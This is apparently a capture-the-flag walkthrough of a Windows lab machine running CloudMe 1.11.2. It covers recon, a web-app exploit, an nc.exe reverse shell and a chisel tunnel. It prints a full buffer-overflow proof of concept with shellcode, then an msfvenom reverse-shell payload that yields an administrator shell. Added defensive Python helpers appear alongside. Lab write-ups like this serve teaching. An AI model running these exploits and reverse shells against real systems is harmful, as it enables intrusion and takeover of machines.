IP
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.198 | cut -d"/" -f1 | tr '\n' ','
We have the following ports open on the target:
8080
Let's get more information about the target:
sudo nmap -sCV -p8080 10.10.10.198 -oA nmap_results
results
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-02 06:16 EST
Nmap scan report for 10.10.10.198
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.43 seconds
Heading over to port 8080 we can see the following.
Let's get feroxbuster running and see if we can find any hidden web pages:
feroxbuster -u http://10.10.10.198:8080 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,js -o dirs.txt
Hunting around the website, within contact.php we find the name of the application running the web app.
We can try to find any vulnerabilities associated with this software. After a bit of googling we find one, and we can use the following exploit to gain a shell on the target:
python2 exploit.py http://10.10.10.198:8080/
we now have a shell on the target machine
We do have limited functionality within this shell, so let's upload nc.exe and upgrade it. First, start an SMB server on our local machine:
sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2support
Copy nc.exe over to the target (from our shell):
copy \\10.10.14.3\shrek123\nc.exe
Start a listener on our local machine:
rlwrap -cAr nc -lvnp 9001
Now execute nc.exe on the target to get our upgraded shell:
.\nc.exe -e cmd.exe 10.10.14.3 9001
we have our shell
When we check netstat we can see two ports listening only on localhost.
Next, let's grab the process ID of whatever is listening on port 8888 (6044 here) and look it up with findstr. The PID changes every couple of seconds, so re-run the netstat lookup and use the most recent PID in the tasklist command:
netstat -ano | findstr 8888
tasklist /v | findstr 6044
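As an added example (not part of the original writeup), the following Python script does the same netstat/tasklist correlation in one step over constructed sample output, so the loopback-only listeners and the image behind each PID come out together. The netstat and tasklist text below is made up for the example in the shape of the real Windows output; only the PID 6044 and the port 8888 are taken from this page, and the image name CloudMe.exe and the other process names are assumptions.

```python
"""Correlate loopback-only TCP listeners with their owning process (defender's triage helper)."""
import re

# Constructed sample in the shape of `netstat -ano` output; not captured from the target.
NETSTAT_SAMPLE = r"""
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4652
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       4468
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6044
  TCP    10.10.10.198:8080      10.10.14.3:51234       ESTABLISHED     4652
  UDP    0.0.0.0:5353           *:*                                    1188
"""

# Constructed sample in the shape of `tasklist /v` output; process names are assumed.
TASKLIST_SAMPLE = r"""
Image Name                     PID Session Name        Session#    Mem Usage Status          User Name              CPU Time Window Title
========================= ======== ================ =========== ============ =============== ====================== ============ ======
httpd.exe                     4652 Services                   0     12,345 K Unknown         NT AUTHORITY\SYSTEM         0:00:01 N/A
localsvc.exe                  4468 Services                   0     45,678 K Unknown         NT AUTHORITY\SYSTEM         0:00:03 N/A
CloudMe.exe                   6044 Console                    1     37,000 K Running         BUFF\shaun                  0:00:00 N/A
"""

# TCP sockets in LISTENING state: local address, port and PID.
LISTEN_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")
# tasklist rows start with the image name followed by the PID; header and separator rows do not match.
TASK_RE = re.compile(r"^(\S+)\s+(\d+)\s")


def parse_listeners(netstat_text):
    """Return a list of (local_ip, port, pid) for every TCP socket in LISTENING state."""
    out = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            out.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return out


def parse_tasklist(tasklist_text):
    """Return {pid: image_name} from tasklist output."""
    procs = {}
    for line in tasklist_text.splitlines():
        m = TASK_RE.match(line)
        if m:
            procs[int(m.group(2))] = m.group(1)
    return procs


def loopback_listeners(netstat_text, tasklist_text):
    """Ports bound only to 127.0.0.0/8, with the owning process name, sorted by port.

    These are the services an attacker cannot reach directly but can reach after a
    foothold (or through a tunnel), so they deserve the same patch scrutiny as exposed ones.
    """
    procs = parse_tasklist(tasklist_text)
    rows = []
    for ip, port, pid in parse_listeners(netstat_text):
        if ip.startswith("127."):
            rows.append((port, pid, procs.get(pid, "<unknown>")))
    return sorted(rows)


if __name__ == "__main__":
    for port, pid, image in loopback_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"127.0.0.1:{port}  pid={pid}  image={image}")
```

Run it on live output by piping `netstat -ano` and `tasklist /v` into files and passing their contents to `loopback_listeners`; because the PID of the CloudMe process changes, the two snapshots should be taken back to back.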
We can see there is a .exe being executed; let's see if we can find it.
Looking through the user shaun's directory we find it within the Downloads directory.
Next, let's see if we can find any vulnerabilities associated with this program. We can see the version number of CloudMe is 1.11.2.
Now, to exploit this service we will need to tunnel from our local machine to the target machine, since port 8888 only listens on localhost. We can use the tool chisel for this, more specifically the Windows .exe on the target and the Linux binary on our machine.
We can transfer the .exe via our SMB server; we will copy the Windows binary to the /programdata directory (where we are staging):
copy \\10.10.14.3\shrek123\chisel_1.9.1_windows_amd64 c.exe
Now we will run the Linux binary on our local machine in server mode:
chmod +x chisel_1.9.1_linux_amd64
sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse
Next, from our target machine, we will run chisel as the client with a reverse forward, so that port 8888 on our machine reaches port 8888 on the target's localhost:
.\c.exe client 10.10.14.3:8000 R:8888:localhost:8888
Now if we run netstat on our local machine we should see we are listening on port 8888:
netstat -ano | grep 8888
Now that we have chisel set up, let's look at the exploit:
searchsploit -m windows/remote/48389.py
The exploit
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
# Instructions:
# Start the CloudMe service and run the script.
import socket

# 127.0.0.1:8888 on our machine reaches the target's CloudMe through the chisel reverse forward
target = "127.0.0.1"

padding1 = b"\x90" * 1052          # filler up to the saved return address
EIP = b"\xB5\x42\xA8\x68"          # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30                # NOP sled in front of the payload

# msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

# pad the whole request out to 1500 bytes
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    print(e)  # report a failed connection instead of crashing with a traceback
Looking at the exploit, it builds a buffer (padding, return address, NOP sled, payload) and sends it over a connection to the target on port 8888. Pretty simple, right?
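To make the buffer layout concrete from the defender's side, here is an added Python example (not from the original writeup or the Exploit-DB PoC) that builds a buffer with the same sizes as the PoC above, using placeholder bytes in place of the return address and the shellcode, and runs a simple heuristic over it of the kind a network sensor or a fuzz-test harness for the service could use to flag overflow-shaped requests to port 8888: a request far longer than any expected message, or one carrying a long NOP sled. The `max_expected` and `sled_threshold` values are assumptions chosen for the example.

```python
"""Heuristic check for overflow-shaped requests, demonstrated on a buffer laid out like the PoC."""

NOP = 0x90


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest contiguous run of byte `value` in `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def analyze(data: bytes, max_expected: int = 256, sled_threshold: int = 16) -> dict:
    """Summarize a captured request and flag it if it is far longer than a sane message
    or carries a long NOP sled. Both thresholds are assumptions for this example."""
    sled = longest_run(data, NOP)
    return {
        "length": len(data),
        "longest_nop_run": sled,
        "sled_offset": data.find(bytes([NOP]) * sled) if sled else -1,
        "suspicious": len(data) > max_expected or sled >= sled_threshold,
    }


def build_poc_shaped_buffer() -> bytes:
    """Constructed buffer with the PoC's layout and sizes: 1052 bytes of padding, a 4-byte
    return-address slot, a 30-byte sled, a payload region, and filler out to 1500 bytes.
    The return-address slot and payload are placeholders, not the PoC's values."""
    padding = b"\x90" * 1052
    eip_slot = b"A" * 4          # placeholder for the overwritten return address
    nops = b"\x90" * 30
    payload = b"\xcc" * 200       # placeholder payload region (INT3 bytes), not shellcode
    overrun = b"C" * (1500 - len(padding + nops + eip_slot + payload))
    return padding + eip_slot + nops + payload + overrun


if __name__ == "__main__":
    poc_like = build_poc_shaped_buffer()
    print("PoC-shaped request:", analyze(poc_like))
    print("return-address slot at offset", poc_like.find(b"AAAA"))
    print("short benign request:", analyze(b"login user\r\n"))
```

The offset at which the placeholder return-address slot appears (1052) is exactly the padding length the PoC uses, which is the number that matters when deciding whether a patched build or an input-length limit in front of the service actually closes the hole: any fix has to reject or truncate input well before that point.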
We can utilize msfvenom to generate our own payload that returns a stageless reverse TCP shell (which we can catch with nc):
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9010 -b '\x00\x0A\x0D' -f python -v payload
Now we can replace the payload in the existing exploit with the one we just generated with msfvenom.
Start our nc listener, run the exploit, and we have a shell as administrator on the target machine.